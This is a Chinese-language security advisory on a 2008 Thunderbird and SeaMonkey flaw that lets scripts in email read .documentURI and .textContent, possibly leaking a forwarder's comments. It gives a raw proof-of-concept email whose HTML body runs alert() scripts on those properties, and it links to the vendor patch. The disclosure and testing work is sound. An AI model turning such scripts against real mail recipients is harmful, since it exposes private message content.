发布日期:2008-11-19
更新日期:2008-11-20
受影响系统:
Mozilla Thunderbird < 2.0.0.18
Mozilla SeaMonkey < 1.1.13
不受影响系统:
Mozilla Thunderbird 2.0.0.18
Mozilla SeaMonkey 1.1.13
描述:
BUGTRAQ ID:
32363Thunderbird和SeaMonkey是Mozilla所发布的邮件和新闻组客户端。
Thunderbird和SeaMonkey允许JavaScript访问.documentURI和.textContent DOM属性,这可能导致泄露邮件消息中的敏感信息。
如果收件人在邮件中允许JavaScript的话,则将恶意邮件转发给该收件人的时候,邮件消息中的脚本就可以访问转发者所添加的评注;如果该邮件消息还允许加载远程内容的话,就可能将所访问到的信息泄露给原始作者。
<*来源:Boris Zbarsky
链接:
http://www.mozilla.org/security/announce/2008/mfsa2008-59.html https://bugzilla.mozilla.org/show_bug.cgi?format=multiple&id=458883*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
From - Tue Oct 7 08:54:27 2008
X-Account-Key: account2
X-UIDL: GmailId11cd803cbe0c86f7
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
X-Mozilla-Keys:
Delivered-To:
foo@example.comReceived: by 10.150.220.5 with SMTP id s5cs123290ybg;
Tue, 7 Oct 2008 08:54:00 -0700 (PDT)
Received: by 10.142.222.4 with SMTP id u4mr2778995wfg.250.1223394839776;
Tue, 07 Oct 2008 08:53:59 -0700 (PDT)
Return-Path: <
bar@example.com>
Message-ID: <
48EB8614.50102@example.com>
Date: Tue, 07 Oct 2008 08:53:56 -0700
From: Bar <
bar@example.com>
User-Agent: Thunderbird 2.0.0.15pre (Macintosh/20080511)
MIME-Version: 1.0
To: Foo <
foo@example.com>
Subject: Alert documentURI
Content-Type: text/html; charset=UTF-8
Content-Transfer-Encoding: 7bit
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
</head>
<body bgcolor="#ffffff" text="#000000">
<p>Don't forget to enable javascript.allow.mailnews and View - Message Body As -
Original HTML</p>
<ol>
<li><script>alert(document.documentURI);</script></li>
<li><script>alert(document.getElementsByTagName("body")[0].textContent);</script></li>
</ol>
<script>alert("document.documentURI:\n" + document.documentURI);</script>
<script>alert(document.getElementsByTagName("body")[0].textContent);</script>
</body>
</html>
建议:
厂商补丁:
Mozilla
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.seamonkey-project.org/releases/http://www.mozilla.com/en-US/thunderbird/all.html